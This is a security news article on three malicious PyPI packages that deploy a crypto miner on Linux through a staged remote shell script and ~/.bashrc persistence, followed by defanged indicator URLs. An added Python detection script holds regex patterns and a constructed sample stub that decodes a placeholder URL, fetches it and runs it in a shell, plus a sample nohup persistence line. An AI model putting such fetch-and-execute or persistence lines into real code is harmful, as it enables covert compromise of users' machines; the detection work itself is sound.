Fortinet researchers identified three malicious packages in the PyPI repository—modularseven, driftme, and catme. These packages, attributed to the same author, “sastra,” were specifically crafted to target Linux systems and install crypto mining software. Notably, the author created a PyPI account shortly before uploading these packages.
3 Malicious PyPI Packages
“Upon initial use, these packages deploy a CoinMiner executable on Linux devices,” noted Fortinet FortiGuard Labs researcher Gabby Xiong. She highlighted that this campaign exhibits similarities with a previous one that utilized a package named “culturestreak” to install a crypto miner.
The malicious code is embedded in the package's __init__.py file, which decodes and fetches the first stage from a remote server. This initial stage is a shell script (“unmi.sh”) responsible for obtaining a configuration file for the mining operation and the CoinMiner file hosted on GitLab.
The ELF binary file is executed in the background using the nohup command, ensuring the process persists after session exit. Following the pattern of the earlier “culturestreak” package, these packages hide their payload, reducing detectability by hosting it on a remote URL. The payload is released incrementally in different stages to carry out its malicious activities.
The connection to the culturestreak package is evident as the configuration file is hosted on the domain papiculo[.]net, and the coin mining executables are hosted on a public GitLab repository.
A notable enhancement in the three new packages is the incorporation of an additional stage, concealing their malicious intent within the shell script. This strategy aids in evading detection by security software and prolongs the exploitation process.
“Furthermore, the malware injects malicious commands into the ~/.bashrc file,” Xiong explained. “This inclusion guarantees the persistence and reactivation of the malware on the user’s device, effectively prolonging the duration of its covert operation. This approach facilitates the extended and discreet exploitation of the user’s device for the attacker’s advantage.”
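The staging chain described above, as an added triage example that is not part of the Fortinet report or this article: it flags a package __init__.py that combines decoding, a remote fetch and execution, and a ~/.bashrc line that relaunches a backgrounded payload from a scratch directory. The regexes, the example.invalid URL and all sample inputs are constructed assumptions.

```python
"""Static triage heuristics for the multi-stage PyPI miner pattern (constructed samples)."""
import re

# Signals for a package __init__.py: decoding an embedded blob, fetching a remote
# stage, and handing it to a shell. Each alone is common; all three together is the
# staging pattern described in the article, not normal package initialisation.
INIT_SIGNALS = {
    "decode": re.compile(r"\bbase64\.b64decode\(|\bbinascii\.(?:a2b_\w+|unhexlify)\("),
    "fetch": re.compile(r"urllib\.request\.urlopen\(|\brequests\.get\(|\bcurl\b|\bwget\b"),
    "exec": re.compile(r"\bos\.system\(|\bsubprocess\.(?:Popen|run|call)\(|\bexec\("),
}
# A ~/.bashrc line that relaunches something from /tmp (or a hidden home directory)
# with nohup and sends it to the background: the persistence trick the report describes.
BASHRC_SIGNAL = re.compile(r"\bnohup\b.*(?:/tmp/|\$HOME/\.\w+/)\S+.*&\s*$")


def score_init(source: str) -> set[str]:
    """Return the names of the signals present in an __init__.py source text."""
    return {name for name, rx in INIT_SIGNALS.items() if rx.search(source)}


def is_suspicious_init(source: str) -> bool:
    """True only when decode, fetch and execute all appear together."""
    return {"decode", "fetch", "exec"} <= score_init(source)


def flag_bashrc_lines(bashrc: str) -> list[str]:
    """Return ~/.bashrc lines that match the backgrounded-relaunch pattern."""
    return [ln for ln in bashrc.splitlines() if BASHRC_SIGNAL.search(ln)]


# Constructed samples (assumptions, not files from the real packages): a benign
# __init__.py, a staging stub modelled on the decode -> fetch -> run chain with a
# base64-encoded https://example.invalid/stage.sh URL, and a tampered ~/.bashrc.
BENIGN_INIT = "from .processor import process\n__all__ = ['process']\n"
STAGING_INIT = (
    "import base64, urllib.request, subprocess\n"
    "u = base64.b64decode(b'aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvc3RhZ2Uuc2g=').decode()\n"
    "subprocess.Popen(['sh', '-c', urllib.request.urlopen(u).read().decode()])\n"
)
BASHRC = (
    "export PATH=$HOME/bin:$PATH\n"
    "alias ll='ls -la'\n"
    "nohup /tmp/X -c /tmp/unmiconfig.json >/dev/null 2>&1 &\n"
)

if __name__ == "__main__":
    print("benign init suspicious:", is_suspicious_init(BENIGN_INIT))
    print("staging init suspicious:", is_suspicious_init(STAGING_INIT))
    print("bashrc persistence lines:", flag_bashrc_lines(BASHRC))
```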
IOCs
Malicious URLs
hxxps[:]//papiculo[.]net/unmi[.]sh
hxxps[:]//papiculo[.]net/unmiconfig[.]json
hxxps[:]//gitlab[.]com/ajo9082734/Mine/-/raw/main/X